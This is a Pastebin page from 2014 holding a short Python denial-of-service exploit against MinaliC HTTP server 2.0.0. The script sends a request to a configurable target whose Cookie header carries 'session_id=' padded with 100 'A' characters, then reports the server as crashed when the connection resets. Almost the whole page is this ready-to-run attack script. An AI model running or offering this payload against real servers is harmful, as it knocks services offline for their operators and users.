Advertisement
Freebyte

Minalic http server DOS Exploit.

Feb 15th, 2014
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.61 KB | None | 0 0
  1. usage = """##################################\nMinalic http server Denial Of Service Exploit.
  2. Exploit type:Remote Crash
  3. MinaliC server 2.0.0 build A001
  4. Autor:freebyte [at box dot az]
  5. Home:http://redhatz.org\n#######################################"""
  6. print(usage)
  7.  
  8. import urllib.request
  9. ##Manual Editing
  10. RHOST = "http://192.168.56.2"
  11. RPORT = 80
  12. header_payload_gen = "session_id=" + '\x41' * 100
  13. conn = urllib.request.Request(RHOST + ":" + str(RPORT))
  14. conn.add_header('Cookie',header_payload_gen)
  15. try:
  16.     urllib.request.urlopen(conn)
  17. except (ConnectionResetError):
  18.     print("Remote server status is 0(Crashed)")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement